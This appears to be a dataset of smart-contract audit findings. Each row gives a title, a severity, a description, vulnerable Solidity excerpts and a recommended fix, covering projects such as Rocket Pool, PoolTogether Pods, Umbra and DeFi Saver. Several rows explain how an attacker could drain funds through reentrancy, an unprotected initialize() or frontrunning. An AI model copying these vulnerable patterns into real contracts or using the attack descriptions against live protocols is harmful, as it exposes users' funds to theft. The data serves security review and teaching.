rejecting zero amount deposit/withdrawal requests,low,"Consider disallowing zero amount token transfers unless the system requires this to work. In most cases, zero amount token transfers will emit an event (that potentially triggers off-chain components). In some cases, they allow the caller without holding any balance to call back to themselves (pot. reentrancy) or the caller provided token address.\\n`depositEther` allows to deposit zero ETH\\nemits `EtherDeposited`\\n`withdrawEther` allows to withdraw zero ETH\\ncalls back to `withdrawer` (msg.sender)!\\nemits `EtherWithdrawn`\\n(depositToken checks for amount >0)\\n`withdrawToken` allows zero amount token withdrawals\\ncalls into user provided (actually a network contract) tokenAddress)\\nemits `TokenWithdrawn`\\n`transferToken` allows zero amount token transfers\\nemits `TokenTransfer`\\n```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n","Zero amount transfers are no-operation calls in most cases and should be avoided. However, as all vault actions are authenticated (to registered system contracts), the risk of something going wrong is rather low. 
Nevertheless, it is recommended to deny zero amount transfers to avoid running code unnecessarily (gas consumption), emitting unnecessary events, or potentially call back to callers/token address for ineffective transfers.",,"```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n" +RocketVault - methods returning static return values and unchecked return parameters,low,"The `Token*` methods in `RocketVault` either throw or return `true`, but they can never return `false`. If the method fails, it will always throw. Therefore, it is questionable if the static return value is needed at all. Furthermore, callees are in most cases not checking the return value of\\nstatic return value `true`\\n```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\nemit TokenWithdrawn(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\n// Emit token withdrawn event\\nemit TokenTransfer(contractKeyFrom, contractKeyTo, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\nreturn value not checked\\n```\\nrocketVault.depositToken(""rocketNodeStaking"", rplTokenAddress, \\_amount);\\n// Update RPL stake amounts & node RPL staked block\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(""rocketTokenRPL""), rplAmount);\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(""rocketTokenRPL""), \\_amount);\\n```\\n\\n```\\nrocketVault.transferToken(""rocketAuctionManager"", getContractAddress(""rocketTokenRPL""), 
rplSlashAmount);\\n```\\n",Define a clear interface for these functions. Remove the static return value in favor of having the method throw on failure (which is already the current behavior).,,"```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n" +RocketMinipoolDelegate - enforce that the delegate contract cannot be called directly,low,"This contract is not meant to be consumed directly and will only be delegate called from `Minipool`. Being able to call it directly might even create the problem that, in the worst case, someone might be able to `selfdestruct` the contract rendering all other contracts that link to it dysfunctional. This might even not be easily detectable because `delegatecall` to an EOA will act as a NOP.\\nThe access control checks on the methods currently prevent methods from being called directly on the delegate. They require state variables to be set correctly, or the delegate is registered as a valid minipool in the system. Both conditions are improbable to be fulfilled, hence, mitigating any security risk. However, it looks like this is more of a side-effect than a design decision, and we would recommend not explicitly stating that the delegate contract cannot be used directly.\\n```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), ""Invalid storage address"");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n","Resolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by removing the constructor and therefore the initialization code from the RocketMinipoolDelegate contract. 
The contract cannot be used directly anymore as all relevant methods are decorated `onlyInitialised` and there is no way to initialize it in the implementation directly.\\nRemove the initialization from the constructor in the delegate contract. Consider adding a flag that indicates that the delegate contract is initialized and only set in the Minipool contract and not in the logic contract (delegate). On calls, check that the contract is initialized.",,"```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), ""Invalid storage address"");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n" +Re-entrancy issue for ERC1155,high,"ERC1155 tokens have callback functions on some of the transfers, like `safeTransferFrom`, `safeBatchTransferFrom`. During these transfers, the `IERC1155ReceiverUpgradeable(to).onERC1155Received` function is called in the `to` address.\\nFor example, `safeTransferFrom` is used in the `LiquidityMining` contract:\\n```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n ""2 weeks after liquidity mining time has not expired"");\\n require(!isNFTDistributed, ""NFT is already distributed"");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, """");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n\\nDuring that transfer, the `distributeAllNFT` function can be called again and again. So multiple transfers will be done for each user.\\nIn addition to that, any receiver of the tokens can revert the transfer. 
If that happens, nobody will be able to receive their tokens.",Add a reentrancy guard.\\nAvoid transferring tokens for different receivers in a single transaction.,,"```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n ""2 weeks after liquidity mining time has not expired"");\\n require(!isNFTDistributed, ""NFT is already distributed"");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, """");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n" +Winning pods can be frontrun with large deposits,high,"`Pod.depositTo()` grants users shares of the pod pool in exchange for `tokenAmount` of `token`.\\n```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, ""Pod:invalid-amount"");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n\\nThe winner of a prize pool is typically determined by an off-chain random number generator, which requires a request to first be made on-chain. The result of this RNG request can be seen in the mempool and frontrun. 
In this case, an attacker could identify a winning `Pod` contract and make a large deposit, diluting existing user shares and claiming the entire prize.","The modifier `pauseDepositsDuringAwarding` is included in the `Pod` contract but is unused.\\n```\\nmodifier pauseDepositsDuringAwarding() {\\n require(\\n !IPrizeStrategyMinimal(\\_prizePool.prizeStrategy()).isRngRequested(),\\n ""Cannot deposit while prize is being awarded""\\n );\\n \\_;\\n}\\n```\\n\\nAdd this modifier to the `depositTo()` function along with corresponding test cases.",,"```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, ""Pod:invalid-amount"");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n" +TokenDrop: Unprotected initialize() function,high,"The `TokenDrop.initialize()` function is unprotected and can be called multiple times.\\n```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n\\nAmong other attacks, this would allow an attacker to re-initialize any `TokenDrop` with the same `asset` and a malicious `measure` token. 
By manipulating the balance of a user in this malicious `measure` token, the entire `asset` token balance of the `TokenDrop` contract could be drained.",Add the `initializer` modifier to the `initialize()` function and include an explicit test that every initialization function in the system can be called once and only once.,,"```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n" +Pod: Re-entrancy during deposit or withdrawal can lead to stealing funds,high,"During the deposit, the token transfer is made after the Pod shares are minted:\\n```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n\\nThat means that if the `token` allows re-entrancy, the attacker can deposit one more time inside the `token` transfer. If that happens, the second call will mint more tokens than it is supposed to, because the first `token` transfer will still not be finished. 
By doing so with big amounts, it's possible to drain the pod.",Add re-entrancy guard to the external functions.,,"```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n" +TokenDrop: Re-entrancy in the claim function can lead to draining funds,high,"If the `asset` token is making a call before the `transfer` to the `receiver` or to any other third-party contract (like it's happening in the `Pod` token using the `_beforeTokenTransfer` function), the attacker can call the `drop` function inside the `transfer` call here:\\n```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n\\nBecause the `totalUnclaimed` is already changed, but the current balance is not, the `drop` function will consider the funds from the unfinished transfer as the new tokens. These tokens will be virtually redistributed to everyone.\\nAfter that, the transfer will still happen, and further calls of the `drop()` function will fail because the following line will revert:\\n`uint256 newTokens = assetTotalSupply.sub(totalUnclaimed);`\\nThat also means that any transfers of the `Pod` token will fail because they all are calling the `drop` function. 
The `TokenDrop` will “unfreeze” only if someone transfers enough tokens to the `TokenDrop` contract.\\nThe severity of this issue is hard to evaluate because, at the moment, there's not a lot of tokens that allow this kind of re-entrancy.","Simply adding re-entrancy guard to the `drop` and the `claim` function won't help because the `drop` function is called from the `claim`. For that, the transfer can be moved to a separate function, and this function can have the re-entrancy guard as well as the `drop` function.\\nAlso, it's better to make sure that `_beforeTokenTransfer` will not revert to prevent the token from being frozen.",,"```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n" +Pod: Having multiple token drops is inconsistent,medium,"The `Pod` contract had the `drop` storage field and mapping of different TokenDrops `(token => TokenDrop)`. When adding a new `TokenDrop` in the mapping, the `drop` field is also changed to the added _tokenDrop:\\n```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n ""Pod:unauthorized-set-token-drop""\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n ""Pod:target-tokendrop-mapping-exists""\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n\\nOn the other hand, the `measure` token and the `asset` token of the `drop` are strictly defined by the Pod contract. 
They cannot be changed, so all `TokenDrops` are supposed to have the same `asset` and `measure` tokens. So it is useless to have different `TokenDrops`.","The mapping seems to be unused, and only one `TokenDrop` will normally be in the system. If that code is not used, it should be deleted.",,"```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n ""Pod:unauthorized-set-token-drop""\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n ""Pod:target-tokendrop-mapping-exists""\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n" +Pod: Fees are not limited by a user during the withdrawal,medium,"When withdrawing from the Pod, the shares are burned, and the deposit is removed from the Pod. If there are not enough deposit tokens in the contract, the remaining tokens are withdrawn from the pool contract:\\n```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n\\nThese tokens are withdrawn with a fee from the pool, which is not controlled or limited by the user.",Allow users to pass a `maxFee` parameter to control fees.,,```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n +Pod.setManager() checks validity of wrong address,low,"The function `Pod.setManager()` allows the `owner` of the Pod contract to change 
the Pod's `manager`. It checks that the value of the existing `manager` in storage is nonzero. This is presumably intended to ensure that the `owner` has provided a valid `newManager` parameter in calldata.\\nThe current check will always pass once the contract is initialized with a nonzero `manager`. But, the contract can currently be initialized with a `manager` of `IPodManager(address(0))`. In this case, the check would prevent the `manager` from ever being updated.\\n```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n","Change the check to:\\n```\\nrequire(address(newManager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n\\nMore generally, attempt to define validity criteria for all input values that are as strict as possible. Consider preventing zero inputs or inputs that might conflict with other addresses in the smart contract system altogether, including in contract initialization functions.",,"```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n" +Reuse of CHAINID from contract deployment,low,"The internal function `_validateWithdrawSignature()` is used to check whether a sponsored token withdrawal is approved by the owner of the stealth address that received the tokens. 
Among other data, the chain ID is signed over to prevent replay of signatures on other EVM-compatible chains.\\n```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19Ethereum Signed Message:\\n32"",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, ""Umbra: Invalid Signature"");\\n}\\n```\\n\\nHowever, this chain ID is set as an immutable value in the contract constructor. In the case of a future contentious hard fork of the Ethereum network, the same `Umbra` contract would exist on both of the resulting chains. One of these two chains would be expected to change the network's chain ID, but the `Umbra` contracts would not be aware of this change. As a result, signatures to the `Umbra` contract on either chain would be replayable on the other chain.\\nThis is a common pattern in contracts that implement EIP-712 signatures. Presumably, the motivation in most cases for committing to the chain ID at deployment time is to avoid recomputing the EIP-712 domain separator for every signature verification. In this case, the chain ID is a direct input to the generation of the signed digest, so this should not be a concern.","Replace the use of the `chainId` immutable value with the `CHAINID` opcode in `_validateWithdrawSignature()`. 
Note that `CHAINID` is only available using Solidity's inline assembly, so this would need to be accessed in the same way as it is currently accessed in the contract's constructor:\\n```\\nuint256 \\_chainId;\\n\\nassembly {\\n \\_chainId := chainid()\\n}\\n```\\n",,"```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19Ethereum Signed Message:\\n32"",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, ""Umbra: Invalid Signature"");\\n}\\n```\\n" +Random task execution,high,"In a scenario where user takes a flash loan, `_parseFLAndExecute()` gives the flash loan wrapper contract (FLAaveV2, FLDyDx) the permission to execute functions on behalf of the user's `DSProxy`. This execution permission is revoked only after the entire recipe execution is finished, which means that in case that any of the external calls along the recipe execution is malicious, it might call `executeAction()` back and inject any task it wishes (e.g. 
take user's funds out, drain approved tokens, etc)\\n```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n",A reentrancy guard (mutex) that covers the entire content of FLAaveV2.executeOperation/FLDyDx.callFunction should be used to prevent such attack.,,"```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n 
IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n" +Tokens with more than 18 decimal points will cause issues,high,"It is assumed that the maximum number of decimals for each token is 18. However uncommon, it is possible to have tokens with more than 18 decimals; for example, YAMv2 has 24 decimals. This can result in broken code flow and unpredictable outcomes (e.g. an underflow will result in really high rates).\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n",Make sure the code won't fail in case the token's decimals is more than 18.,,"```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n" +"Error codes of Compound's Comptroller.enterMarket, Comptroller.exitMarket are not checked",high,"Compound's 
`enterMarket/exitMarket` functions return an error code instead of reverting in case of failure. DeFi Saver smart contracts never check for the error codes returned from Compound smart contracts, although the code flow might revert due to unavailability of the CTokens, however early on checks for Compound errors are suggested.\\n```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n",Caller contract should revert in case the error code is not 0.,,```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n +Reversed order of parameters in allowance function call,medium,"When trying to pull the maximum amount of tokens from an approver to the allowed spender, the parameters that are used for the `allowance` function call are not in the same order that is used later in the call to `safeTransferFrom`.\\n```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? 
allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n",Reverse the order of parameters in `allowance` function call to fit the order that is in the `safeTransferFrom` function call.,,"```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n" +Kyber getRates code is unclear,low,"`getSellRate` can be converted into one function to get the rates, which then for buy or sell can swap input and output tokens\\n`getBuyRate` uses a 3% slippage that is not documented.\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, 
uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n","Refactoring the code to separate getting rate functionality with `getSellRate` and `getBuyRate`. Explicitly document any assumptions in the code ( slippage, etc)",,"```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n" +Return values not used for DFSExchangeCore.onChainSwap,low,"Return values from `DFSExchangeCore.onChainSwap` are not used.\\n```\\nfunction 
\\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n\\n```\\nfunction \\_buy(ExchangeData memory exData) internal returns (address, uint256) {\\n require(exData.destAmount != 0, ERR\\_DEST\\_AMOUNT\\_MISSING);\\n\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then 